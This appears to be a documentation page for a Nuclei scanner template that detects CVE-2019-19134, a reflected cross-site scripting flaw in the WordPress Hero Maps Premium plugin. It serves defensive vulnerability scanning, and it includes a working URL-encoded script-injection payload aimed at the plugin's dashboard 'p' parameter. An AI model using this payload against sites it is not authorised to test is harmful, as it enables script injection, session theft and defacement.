WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting
ID: CVE-2019-19134
Severity: medium
Author: daffainfo
Tags: cve,cve2019,wpscan,wordpress,xss,wp-plugin,maps,heroplugins
Description
Section titled “Description”WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.
YAML Source
Section titled “YAML Source”id: CVE-2019-19134
info: name: WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting author: daffainfo severity: medium description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Hero Maps Premium plugin (>=2.2.2) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01 - https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php - https://heroplugins.com/product/maps/ - https://heroplugins.com/changelogs/hmaps/changelog.txt - https://nvd.nist.gov/vuln/detail/CVE-2019-19134 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-19134 cwe-id: CWE-79 epss-score: 0.00203 epss-percentile: 0.58276 cpe: cpe:2.3:a:heroplugins:hero_maps_premium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: heroplugins product: hero_maps_premium framework: wordpress tags: cve,cve2019,wpscan,wordpress,xss,wp-plugin,maps,heroplugins
http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and matchers: - type: word part: body words: - 'foo"></script><script>alert(document.domain)</script>'
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4b0a00483046022100f61249b68bd5b2eb9b312bc223be3cf5721df8a0c5d506e3f063ef23be4a5fc80221009d8f1bb44109ef31dce1046895aa7177f8dfc44da80a41fd9a4f707070b5bcef:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-19134.yaml"